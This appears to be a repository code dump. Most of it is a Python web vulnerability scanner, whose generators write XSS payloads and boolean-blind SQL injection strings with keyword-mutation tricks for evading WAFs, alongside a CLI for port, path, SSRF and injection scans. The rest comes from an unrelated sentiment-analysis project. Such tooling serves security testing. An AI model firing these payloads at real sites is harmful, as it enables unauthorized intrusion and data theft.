                f.write((i.replace("*",tem_payload+"(668868)").replace("(","`").replace(")","`").replace(" ","/"))+"\n")
                f.write((i.replace("*",tem_payload+"(668868)").replace("(","`").replace(")","`"))+"\n")
                # doubled "script" keyword to defeat one-pass keyword filters
                f.write(i.replace("script","scscriptript").replace("*",self.payload)+"\n")
                f.write(i.replace("script","scscriptript").replace("*",self.payload).replace(" ","/")+"\n")
                f.write(i.replace("*",self.payload).replace("script","scscriptript").replace("(","`").replace(")","`")+"\n")
                f.write(i.replace("script","scscriptript").replace("*",tem_payload+"(668868)").replace(" ","/")+"\n")
                f.write(i.replace("script","scscriptript").replace("*",tem_payload+"(668868)")+"\n")
                f.write((i.replace("script","scscriptript").replace("*",tem_payload+"(668868)").replace("(","`").replace(")","`").replace(" ","/"))+"\n")
                f.write((i.replace("script","scscriptript").replace("*",tem_payload+"(668868)").replace("(","`").replace(")","`"))+"\n")
    def make_attribute(self):
        """Write attribute-context payloads to ``attr_payload.txt``.

        Covers three sink families: bare on-event handler values,
        ``location=`` assignments, and src-like attributes broken out of
        with ``" onerror=`` -- each in several encodings.
        """
        with open(self.attribute_file,"w") as f:
            # on-event handler context
            f.write(self.payload+"\n")
            f.write(self.html_encode(self.payload)+"\n")
            f.write(self.html_encode(self.payload).replace("(","`").replace(")","`")+"\n")
            f.write(self.js_encode(self.payload[:5])+"(668868)"+"\n")
            f.write((self.js_encode(self.payload[:5])+"(668868)").replace("(","`").replace(")","`")+"\n")
            f.write(self.html_encode(self.protocal + self.js_encode(self.payload[:5])+"(668868)")+"\n")
            # BUGFIX: the trailing newline used to be concatenated into the
            # replace() argument, so this payload merged with the next line.
            f.write(self.html_encode(self.protocal + self.js_encode(self.payload[:5])+"(668868)").replace("(","`").replace(")","`")+"\n")
            # location= sink; the jump target additionally tolerates URL-encoding
            f.write("=location=\"{}{}\">\n".format(self.protocal,self.js_encode(self.payload[:5])+"(668868)"))
            f.write("=location=\"{}{}\">\n".format(self.protocal,self.js_encode(self.payload[:5])+"`668868`"))
            f.write("=location=\"{}{}\">\n".format(self.protocal,self.url_encode(self.payload)))
            f.write("=location=\"{}{}\">\n".format(self.html_encode(self.protocal),self.js_encode(self.payload[:5])+"(668868)"))
            f.write("=location=\"{}{}\">\n".format(self.html_encode(self.protocal),self.js_encode(self.payload[:5])+"`668868`"))
            f.write("=location=\"{}{}\">\n".format(self.html_encode(self.protocal),self.payload))
            f.write("=location=\"{}{}\">\n".format(self.html_encode(self.protocal),self.html_encode(self.js_encode(self.payload[:5])+"(668868)")))
            f.write("=location=\"{}{}\">\n".format(self.html_encode(self.protocal),self.html_encode(self.js_encode(self.payload[:5])+"`668868`")))
            f.write("=location=\"{}{}\">\n".format(self.html_encode(self.protocal),self.html_encode(self.url_encode(self.payload))))
            # src-like attributes: break out of the value with " onerror=
            f.write("\" onerror=location=\"{}{}\">\n".format(self.protocal,self.js_encode(self.payload[:5])+"(668868)"))
            f.write("\" onerror=location=\"{}{}\">\n".format(self.protocal,self.js_encode(self.payload[:5])+"`668868`"))
            f.write("\" onerror=location=\"{}{}\">\n".format(self.protocal,self.url_encode(self.payload)))
            f.write("\" onerror=location=\"{}{}\">\n".format(self.html_encode(self.protocal),self.js_encode(self.payload[:5])+"(668868)"))
            f.write("\" onerror=location=\"{}{}\">\n".format(self.html_encode(self.protocal),self.js_encode(self.payload[:5])+"`668868`"))
            f.write("\" onerror=location=\"{}{}\">\n".format(self.html_encode(self.protocal),self.url_encode(self.payload)))
            f.write("\" onerror=location=\"{}{}\">\n".format(self.html_encode(self.protocal),self.html_encode(self.js_encode(self.payload[:5])+"(668868)")))
            f.write("\" onerror=location=\"{}{}\">\n".format(self.html_encode(self.protocal),self.html_encode(self.js_encode(self.payload[:5])+"`668868`")))
            f.write("\" onerror=location=\"{}{}\">\n".format(self.html_encode(self.protocal),self.html_encode(self.url_encode(self.payload))))
            f.write("{}{}\n".format(self.protocal,self.js_encode(self.payload[:5])+"(668868)" + ">"))
            f.write("{}{}\n".format(self.protocal,self.js_encode(self.payload[:5])+"`668868`" + ">"))
            f.write("{}{}\n".format(self.protocal,self.url_encode(self.payload)))
            f.write("{}{}\n".format(self.html_encode(self.protocal),self.js_encode(self.payload[:5])+"(668868)" + ">"))
            f.write("{}{}\n".format(self.html_encode(self.protocal),self.js_encode(self.payload[:5])+"`668868`" + ">"))
            f.write("{}{}\n".format(self.html_encode(self.protocal),self.url_encode(self.payload) + ">"))
            f.write("{}{}\n".format(self.html_encode(self.protocal),self.html_encode(self.js_encode(self.payload[:5])+"(668868)" + ">")))
            f.write("{}{}\n".format(self.html_encode(self.protocal),self.html_encode(self.js_encode(self.payload[:5])+"`668868`" + ">")))
            f.write("{}{}\n".format(self.html_encode(self.protocal),self.html_encode(self.url_encode(self.payload + ">"))))
if __name__ == '__main__':
    # Regenerate the attribute-context payload dictionary.
    generator = make_payload()
    # generator.make_tag()  # tag payload generation left disabled, as before
    generator.make_attribute()
50,663 | PanDa1G1/sunsecScanner | refs/heads/master | /sql_injection/make_dict/make_boolen_dict.py | # -*- coding: UTF-8 -*-
"""Generate the boolean-blind SQL-injection payload dictionary.

Each of the five base payloads is combined with every prefix/suffix pair,
and additionally emitted with every non-empty combination of keyword
mutations applied (to evade naive keyword filters).  The hand-unrolled
six-level loops of the original are replaced by itertools.combinations;
the emitted lines and their order are unchanged.
"""
from itertools import combinations

# (needle, replacement) keyword mutations used to evade simple WAF filters
SWAPS = [("and","AnaNdd"),("suBstr","Mid"),("oR","ooRR"),("select","SELSEleCtect"),("aScii","aSciaSciii"),("suBstr","subSuBstrstr")]
# quote/paren breakout prefixes
PREFIXES = ["' ",'" ',"') "," ","')) ",")' ","))' ",'") ','")) ',')" ','))" ']
# comment / re-balancing suffixes
SUFFIXES = ["#","-- ","and('1')='1","and('1')=\"1","and('1')=('1","and('1')=(\"1","and('1')=(('1","and('1')=((\"1","and('1')='(1","and('1')='((1","and('1')=\"((1","and('1')=\"(1"]
# boolean oracle payloads (true/false branches around a fixed digit test)
PAYLOADS = [
    "^(suBstr('867546968',2,1)=6)^1='0'",
    "oR((SEleCt(suBstr('867546968',2,1)))=6)",
    "oR!(sEleCt(suBstr('867546268',2,1))<>6)",
    "oR((SEleCt(aScii(suBstr('867546938',2,1))))=54)",
    "^(aScii(suBstr('867546968',2,1))=64)^1='0'",
]


def _apply_swaps(line, indices):
    """Apply the chosen keyword mutations to *line*, left to right.

    Sequential application matches the original chained .replace() calls,
    so overlapping needles (the two "suBstr" entries) interact identically.
    """
    for idx in indices:
        line = line.replace(SWAPS[idx][0], SWAPS[idx][1])
    return line


def generate_lines():
    """Yield every dictionary line in the original output order.

    For each prefix/suffix pair: first the five unmutated payloads, then
    every combination of 1..len(SWAPS) mutations in lexicographic order,
    five payloads each.
    """
    for pre in PREFIXES:
        for stuff in SUFFIXES:
            base = [pre + payload + stuff for payload in PAYLOADS]
            for line in base:
                yield line
            for r in range(1, len(SWAPS) + 1):
                for combo in combinations(range(len(SWAPS)), r):
                    for line in base:
                        yield _apply_swaps(line, combo)


def main():
    """Append the full dictionary to the payload file."""
    with open("../payload/Boolen.txt", "a+") as f:
        for line in generate_lines():
            f.write(line + "\n")


if __name__ == '__main__':
    main()
50,664 | PanDa1G1/sunsecScanner | refs/heads/master | /src/_print.py | import colorama
from colorama import Fore, Style, Back
import platform
import sys
import os
class _print():
def __init__(self):
self.terminal_size = os.get_terminal_size().columns
self.system = platform.system()
self.lastInLine = False
def inLine(self, string):
self.lastInLine = True
if len(string) > self.terminal_size:
string = "\r" + string[:self.terminal_size - 8] + "..." + Style.RESET_ALL + "\r"
string = ("\r" + string + Style.RESET_ALL) + "\r"
sys.stdout.write(string)
sys.stdout.flush()
def new_line(self, message, nowrap=False):
if self.lastInLine:
self.erase()
if self.system == 'Windows':
sys.stdout.write(message)
sys.stdout.flush()
else:
sys.stdout.write(message)
if not nowrap:
sys.stdout.write('\n')
sys.stdout.flush()
self.lastInLine = False
def print_process(self,present,url):
self.inLine(
Fore.LIGHTYELLOW_EX + '[~] {:2.1f}% [{:<50}] {}'.format(present if present < 100 else 99.9,
"=" * int(present // 2) + (
">" if present < 100 else ""), url).ljust(
self.terminal_size - 5, " "))
def print_forbidden(self,url):
self.new_line(Fore.LIGHTRED_EX + '[-] 403\t\t{}'.format(url))
def print_401(self,url):
self.new_line(Fore.LIGHTBLUE_EX + '[-] 401\t\t{}'.format(url))
def print_succ(self,url):
self.new_line(Fore.LIGHTGREEN_EX + '[*] 200\t\t{}'.format(url))
def print_info(self, message, **kwargs):
if self.system == "Windows":
self.new_line(Fore.LIGHTYELLOW_EX + Style.NORMAL + "[~] {0}".format(message) + Style.RESET_ALL, **kwargs)
else:
self.new_line(Fore.LIGHTGREEN_EX + Style.NORMAL + "[~] {0}".format(message) + Style.RESET_ALL, **kwargs)
def erase(self):
if self.system == 'Windows':
sys.stdout.write(Style.RESET_ALL + '\r' + ' ' * (self.terminal_size - 2) + '\r')
sys.stdout.flush()
else:
sys.stdout.write('\033[1K')
sys.stdout.write('\033[0G')
sys.stdout.flush()
def print_end(self,time,issue):
self.new_line(Fore.LIGHTYELLOW_EX + "[~] {} finished! time spent {}s {} {}".format(issue,time,' '*50,'\n'))
def check_sess(self,url,name):
self.new_line(Fore.LIGHTGREEN_EX + '[*] ' + Fore.LIGHTGREEN_EX + '{}'.format(name) + Fore.LIGHTGREEN_EX +' is existed in'+ Fore.LIGHTGREEN_EX +' {}'.format(url))
def port_end(self,time):
self.new_line(Fore.LIGHTYELLOW_EX + '[~] finshed! time spent {}s'.format(time))
def port_fail(self,port,state):
sys.stdout.write(Fore.LIGHTGREEN_EX + '[*] port: {}\t\tstate: '.format(port) + Fore.LIGHTRED_EX + '{} {}'.format(state,'\n'))
def port_sess(self,port,state):
sys.stdout.write(Fore.LIGHTGREEN_EX + '[*] port: {}\t\tstate: {} {}'.format(port,state,'\n'))
def port_res(self,port,state,service):
sys.stdout.write(Fore.LIGHTGREEN_EX + '[*] port: {}\t\tstate: {}\tservice: {}\n'.format(port,state,service))
def fuzz_res(self,param,value):
sys.stdout.write(Fore.LIGHTGREEN_EX + '[*] param:{}\t\tvlaue:{}\n'.format(param,value))
def ip_res(self,ip):
sys.stdout.write(Fore.LIGHTGREEN_EX + '[*] ip: {}\t\tstate:up\n'.format(ip))
def start_scan(self,type):
sys.stdout.write(Fore.LIGHTGREEN_EX + "[~]start checking {} inject......\n".format(type))
def sql_stop(self):
sys.stdout.write(Fore.LIGHTYELLOW_EX + "[*]scan finished\n")
| {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,665 | PanDa1G1/sunsecScanner | refs/heads/master | /main.py | from src.scan import path_scan
from src._print import _print
import argparse
from src.finger_scan import FingerScan
from src.PortScan import myThread
from src.fuzz import Fuzz
import time
from src.Ipscan import Ipscan
from sql_injection.union import ScanUnion
from sql_injection.error_inject import error_inject
from sql_injection.Boolen_scan import Boolen_Scan
from sql_injection.time_scan import Time_scan
from xss.xss_scan import xss_Scanner
from ssrf.ssrf import ssrfScan
import sys
class menu():
    def __init__(self):
        """Create the CLI menu; sets up the shared console printer."""
        self._print = _print()
def get_input(self):
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--url', dest="scan_url", help="url for scanning", type=str)
parser.add_argument('-n', '--num', dest="coroutine_num", help="coroutines num you want to use default:10", type=str,default = 10)
parser.add_argument('-d', '--dictory', dest="dictory", help="dictory you want to use", type=str,default = 'directroy/dirList.txt')
parser.add_argument('-s', '--sqlit',dest="sqlite_file", help="datebase file you want to use", type=str,default = 'database/web.db')
parser.add_argument('-p', '--path_scan',dest="path_scan", help="scan the path eg: -u [url] -p 1 [-d directroy -n num]", type=str,default = False)
parser.add_argument('-f', '--finger_scan',dest="finger_scan", help="scan the finger eg: -u [url] -f 1 [-s xx.db]", type=str,default = False)
parser.add_argument('-P', '--port_scan',dest="port_scan", help="scan port \n\r eg: -u [host] -P [1-65535] or [22,33,88,77] or 22 [-t]", type=str,default = False)
parser.add_argument('-t', '--thread_num',dest="thread_num", help="the number of thread default:100", type=int,default = 100)
parser.add_argument('-F', '--fuzz',dest="fuzz", help="http://url?fuzz=fuzz or http://url?file=fuzz", type=str,default = False)
parser.add_argument('-sP', '--Ipscan',dest="Ipscan", help="xxx.xxx.xxx.0/24 or /16 or /8", type=str,default = False)
parser.add_argument('--method', '--method',dest="sql_method", help="method to request", type=str,default = "GET")
parser.add_argument('-r', '--headerFile',dest="header_file", help="header file,post request", type=str,default = False)
parser.add_argument('--sql', '--sql',dest="sql_scan", help="whether to scan sqlinjection ", type=str,default = False)
parser.add_argument('--union', '--union',dest="union_scan", help="union scan ", type=str,default = False)
parser.add_argument('--error', '--error',dest="error_scan", help="error scan ", type=str,default = False)
parser.add_argument('--Boolen', '--Boolen',dest="Boolen_scan", help="Boolen scan ", type=str,default = False)
parser.add_argument('--true_string', '--true_string', dest="true_string", help="if payload is true,the string that will in page", type=str,default = "")
parser.add_argument('--false_string', '--false_string', dest="false_string", help="tif payload is False,the string that will in page", type=str,default = "")
parser.add_argument('--time', '--time',dest="time_scan", help="Boolen scan ", type=str,default = False)
parser.add_argument('--wait_time', '--wait_time',dest="wait_time", help="wait_time ", type=int,default = 5)
parser.add_argument('--payload_num', '--payload_num',dest="payload_num", help="the num of payload you want to print. default 10(used for error,boolen,time inject)", type=int,default = 10)
parser.add_argument('-x', '--xss',dest="xss_scan", help="xss scan", type=str,default = False)
parser.add_argument('--param_file', '--param_file', dest="param_file", help="LFi fuzz param_file", type=str,default = 'directroy/123.txt')
parser.add_argument('--value_file', '--value_file', dest="value_file", help="LFi fuzz value_file", type=str,default = 'directroy/pathtotest_huge.txt')
parser.add_argument('--ssrf', '--ssrf', dest="ssrf_scan", help="whether start ssrf scan", type=str,default = False)
parser.add_argument('--redirect_file', '--redirect_file', dest="redirect_file", help="the path of 302 file if not will not try 302", type=str,default = None)
self.args = parser.parse_args()
def start(self):
try :
self.get_input()
#路径扫描
if self.args.path_scan:
time0 = time.time()
scan_path = path_scan(self.args.scan_url,self.args.coroutine_num,self.args.dictory)
scan_path.start()
time1 = time.time()
self._print.print_end(time1 - time0,'path scan')
#指纹扫描
if self.args.finger_scan:
time0 = time.time()
finger_scan = FingerScan(self.args.scan_url,self.args.sqlite_file)
finger_scan.run()
time1 = time.time()
self._print.print_end(time1 - time0,'finger scan')
#端口扫描
if self.args.port_scan:
thread = myThread(self.args.scan_url,self.args.port_scan)
thread.in_queue()
thread.scan_start()
if self.args.fuzz:
fuzz = Fuzz(self.args.scan_url,num = self.args.coroutine_num,param_file=self.args.param_file,value_file=self.args.value_file)
fuzz.start()
# ip扫描
if self.args.Ipscan:
scan = Ipscan(self.args.scan_url)
scan.ip_queue()
scan.scan_start()
if self.args.sql_scan:
if self.args.union_scan:
#self._print.start_scan("union",time0)
union_scan = ScanUnion(self.args.scan_url,self.args.sql_method,self.args.header_file)
union_scan.union_inject()
self._print.sql_stop()
if self.args.error_scan:
time0 = time.time()
self._print.start_scan("error")
error_scan = error_inject(self.args.scan_url,self.args.sql_method,self.args.header_file,payload_num=self.args.payload_num)
error_scan.start()
time1 = time.time()
self._print.print_end(time1 - time0,'SQL_Error scan')
if self.args.Boolen_scan:
time0 = time.time()
self._print.start_scan("Boolen")
Boolen_scan = Boolen_Scan(self.args.scan_url,method = self.args.sql_method,file = self.args.header_file,thread_num = self.args.thread_num,payload_num=self.args.payload_num, string=self.args.true_string, not_string=self.args.false_string)
Boolen_scan.start()
time1 = time.time()
self._print.print_end(time1 - time0,'SQL_Boolen scan')
if self.args.time_scan:
time0 = time.time()
self._print.start_scan("time")
Time = Time_scan(self.args.scan_url,method = self.args.sql_method,file = self.args.header_file,thread_num = self.args.thread_num,payload_num=self.args.payload_num,wait_time=self.args.wait_time)
Time.start()
time1 = time.time()
self._print.print_end(time1 - time0,'SQL_time scan')
if not self.args.union_scan and not self.args.error_scan and not self.args.Boolen_scan and not self.args.time_scan:
time0 = time.time()
self._print.start_scan("union")
union_scan = ScanUnion(self.args.scan_url,method = self.args.sql_method,file = self.args.header_file)
union_scan.union_inject()
self._print.start_scan("error")
error_scan = error_inject(self.args.scan_url,self.args.sql_method,self.args.header_file,payload_num=self.args.payload_num)
error_scan.start()
self._print.sql_stop()
self._print.start_scan("Boolen")
Boolen_scan = Boolen_Scan(self.args.scan_url,method = self.args.sql_method,file = self.args.header_file,thread_num = self.args.thread_num,payload_num=self.args.payload_num,string=self.args.true_string,not_string=self.args.false_string)
Boolen_scan.start()
self._print.start_scan("time")
time_scan = time_scan(self.args.scan_url,method = self.args.sql_method,file = self.args.header_file,thread_num = self.args.thread_num,payload_num=self.args.payload_num,wait_time = self.args.wait_time)
time_scan.start()
time1 = time.time()
self._print.print_end(time1 - time0,'SQL scan')
if self.args.xss_scan:
self._print.start_scan("xss")
xssScanner=xss_Scanner(self.args.scan_url,thread_num = self.args.thread_num,payload_num=self.args.payload_num)
xssScanner.run()
if self.args.ssrf_scan:
self._print.start_scan("ssrf")
if self.args.redirect_file:
time0 = time.time()
ssrfScan_ = ssrfScan(self.args.scan_url,self.args.scan_url)
ssrfScan_.FileScan()
ssrfScan_.dictScan()
ssrfScan_.redirectScan()
ssrfScan_.url_in_queue()
ssrfScan_.start()
time1 = time.time()
self._print.print_end(time1 - time0,'SSRF scan')
else:
time0 = time.time()
ssrfScan_ = ssrfScan(self.args.scan_url)
ssrfScan_.FileScan()
ssrfScan_.dictScan()
ssrfScan_.url_in_queue()
ssrfScan_.start()
time1 = time.time()
self._print.print_end(time1 - time0,'SSRF scan')
except OSError as e:
pass
def banner(self):
banner = '''
____ ____
/ ___| _ _ _ __ ___ ___ ___/ ___| ___ __ _ _ __
\___ \| | | | '_ \/ __|/ _ \/ __\___ \ / __/ _` | '_ \
___) | |_| | | | \__ \ __/ (__ ___) | (_| (_| | | | |
|____/ \__,_|_| |_|___/\___|\___|____/ \___\__,_|_| |_|
'''
print(banner)
if __name__ == "__main__":
    # Entry point: show the logo, then run whichever scans were requested.
    app = menu()
    app.banner()
    app.start()
| {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,704 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/metrics/__init__.py | from .confusion import ConfusionMatrix
from .functional import * | {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,705 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /scripts/baseline.py | """
Run the baseline script.
"""
import torch
from torch.utils.data import DataLoader
import numpy as np
from baseline.dataset import Vocab, ConllDataset
from baseline.word2vec import Word2Vec
from baseline.model import BiLSTM
import argparse
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("--NUM_LAYERS", "-nl", default=1, type=int)
    parser.add_argument("--HIDDEN_DIM", "-hd", default=100, type=int)
    parser.add_argument("--BATCH_SIZE", "-bs", default=50, type=int)
    # BUG FIX: dropout and learning rate are floats; with `type=int`,
    # e.g. `--DROPOUT 0.2` would fail with "invalid int value".
    parser.add_argument("--DROPOUT", "-dr", default=0.01, type=float)
    parser.add_argument("--EMBEDDING_DIM", "-ed", default=100, type=int)
    parser.add_argument("--EMBEDDINGS", "-emb", default="word2vec/models.txt")
    parser.add_argument("--TRAIN_EMBEDDINGS", "-te", action="store_true")
    parser.add_argument("--LEARNING_RATE", "-lr", default=0.01, type=float)
    parser.add_argument("--EPOCHS", "-e", default=50, type=int)
    args = parser.parse_args()
    print(args)

    # Get embeddings (CHANGE TO GLOVE OR FASTTEXT EMBEDDINGS)
    embeddings = Word2Vec(args.EMBEDDINGS)
    w2idx = embeddings._w2idx

    # Create shared vocabulary for tasks
    vocab = Vocab(train=True)
    # Merge in the pretrained word2idx, shifted by two so the PAD and UNK
    # tokens at indices 0 and 1 are not overwritten.
    with_unk = {}
    for word, idx in embeddings._w2idx.items():
        with_unk[word] = idx + 2
    vocab.update(with_unk)

    # Import datasets; this also adds to vocab any word missing from
    # the pretrained embeddings.
    dataset = ConllDataset(vocab)
    train_iter = dataset.get_split("data/train.conll")
    dev_iter = dataset.get_split("data/dev.conll")
    test_iter = dataset.get_split("data/test.conll")

    # Build an embedding matrix covering the pretrained vectors plus fresh
    # zero rows for PAD, UNK and out-of-embedding words.
    diff = len(vocab) - embeddings.vocab_length - 2
    PAD_UNK_embeddings = np.zeros((2, args.EMBEDDING_DIM))
    new_embeddings = np.zeros((diff, args.EMBEDDING_DIM))
    new_matrix = np.concatenate((PAD_UNK_embeddings,
                                 embeddings._matrix,
                                 new_embeddings))

    # Data iterators; dev/test use batch_size=1 for the predict() and
    # evaluate() methods.
    train_loader = DataLoader(train_iter,
                              batch_size=args.BATCH_SIZE,
                              collate_fn=train_iter.collate_fn,
                              shuffle=True)
    dev_loader = DataLoader(dev_iter,
                            batch_size=1,
                            collate_fn=dev_iter.collate_fn,
                            shuffle=False)
    test_loader = DataLoader(test_iter,
                             batch_size=1,
                             collate_fn=test_iter.collate_fn,
                             shuffle=False)

    # Training runs on CPU.  NOTE(review): the original comment claimed
    # automatic CPU/GPU selection, but the code pins CPU; behaviour kept.
    device = torch.device('cpu')

    model = BiLSTM(word2idx=vocab,
                   embedding_matrix=new_matrix,
                   embedding_dim=args.EMBEDDING_DIM,
                   hidden_dim=args.HIDDEN_DIM,
                   device=device,
                   output_dim=5,
                   num_layers=args.NUM_LAYERS,
                   word_dropout=args.DROPOUT,
                   learning_rate=args.LEARNING_RATE,
                   train_embeddings=args.TRAIN_EMBEDDINGS)
    model.fit(train_loader, dev_loader, epochs=args.EPOCHS)
    binary_f1, propor_f1 = model.evaluate(test_loader)

    # For printing predictions we prefer label strings over indices, so build
    # an index-to-label mapping for print_predictions().
    idx2label = {i: l for l, i in dataset.label2idx.items()}
    model.print_predictions(test_loader,
                            outfile="predictions.conll",
                            idx2label=idx2label)
50,706 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/datasets/nonlpl.py | r"""
``NoNLPL`` is a dataset instance used to load pre-trained embeddings.
"""
import os
from torchtext.vocab import Vectors
from ._utils import download_from_url, extract_to_dir
class NoNLPL(Vectors):
    r"""The Norwegian Bokmal NLPL dataset contains more than 1,000,000 pre-trained word embeddings from
    the norwegian language.

    Examples::

        >>> vectors = NoNLPL.load()
    """
    # Archive(s) the vectors are fetched from.
    urls = ['http://vectors.nlpl.eu/repository/20/58.zip']
    # Repository id, also used as the extraction sub-directory name.
    name = '58'
    dirname = 'nlpl-vectors'

    def __init__(self, filepath):
        super().__init__(filepath)

    @classmethod
    def load(cls, data='model.txt', root='.vector_cache'):
        r"""Load pre-trained word embeddings, downloading them on first use.

        Args:
            data (string): file inside the extracted archive containing the pre-trained word embeddings.
            root (string): root folder where vectors are saved.

        Returns:
            NoNLPL: loaded dataset.
        """
        path = os.path.join(root, cls.dirname, cls.name)
        # Download and extract only when not already cached.
        if not os.path.isdir(path):
            path = cls.download(root)
        filepath = os.path.join(path, data)
        # BUG FIX: use `cls` instead of the hard-coded class name so that
        # subclasses get an instance of their own type.
        return cls(filepath)

    @classmethod
    def download(cls, root):
        r"""Download and unzip a web archive (.zip, .gz, or .tgz).

        Args:
            root (str): Folder to download data to.

        Returns:
            string: Path to extracted dataset.
        """
        path_dirname = os.path.join(root, cls.dirname)
        path_name = os.path.join(path_dirname, cls.name)
        if not os.path.isdir(path_dirname):
            for url in cls.urls:
                filename = os.path.basename(url)
                zpath = os.path.join(path_dirname, filename)
                if not os.path.isfile(zpath):
                    if not os.path.exists(os.path.dirname(zpath)):
                        os.makedirs(os.path.dirname(zpath))
                    # BUG FIX: the message printed a literal "(unknown)"
                    # instead of the archive name.
                    print(f'Download {filename} from {url} to {zpath}')
                    download_from_url(url, zpath)
                extract_to_dir(zpath, path_name)
        return path_name
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,707 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/metrics/confusion.py | r"""
Defines a ```ConfusionMatrix```, used to compute scores (True Positive, False Negative etc.).
.. image:: images/confusion_matrix.png
Example:
.. code-block:: python
# Create a confusion matrix
confusion = ConfusionMatrix(num_classes=10)
# Update the confusion matrix with a list of predictions and labels
confusion.update(gold_labels, predictions)
# Get the global accuracy, precision, scores from attributes or methods
confusion.accuracy()
"""
import pandas as pd
from sklearn.metrics import precision_score, accuracy_score, f1_score, recall_score
from .functional import *
try:
import seaborn as sns
except ModuleNotFoundError:
print('WARNING: Seaborn is not installed. Plotting confusion matrices is unavailable.')
class ConfusionMatrix:
    r"""A ```ConfusionMatrix``` is a matrix of shape :math:`(C, C)`, used to index predictions :math:`p \in C`
    regarding their gold labels (or truth labels).
    """

    def __init__(self, labels=None, data=None, names=None, axis_label=0, axis_pred=1):
        r"""
        Args:
            labels (list, optional): ordered list of label values. Defaults to ``range(len(data))``.
            data (array-like, optional): pre-filled square confusion matrix.
            names (list, optional): display names used for plotting / export.
            axis_label (int): axis of ``data`` holding the gold labels.
            axis_pred (int): axis of ``data`` holding the predictions.
        """
        assert labels is not None or data is not None, 'Failed to initialize a confusion matrix. Please provide ' \
                                                       'the labels `labels` or a starting matrix `data`.'
        # General attributes
        self.num_classes = len(labels) if labels is not None else len(data)
        self.matrix = np.zeros((self.num_classes, self.num_classes)) if data is None else np.array(data)
        self.labels = list(range(self.num_classes)) if labels is None else labels
        self.names = names
        # Maps between label values and confusion-matrix row/column indices.
        self.label2idx = {label: i for (label, i) in zip(self.labels, np.arange(self.num_classes))}
        self.idx2label = {i: label for (label, i) in zip(self.labels, np.arange(self.num_classes))}
        # When starting from an existing matrix, recover flat prediction /
        # gold-label lists from it so the sklearn-based scores still work.
        self.predictions, self.gold_labels = ([], []) \
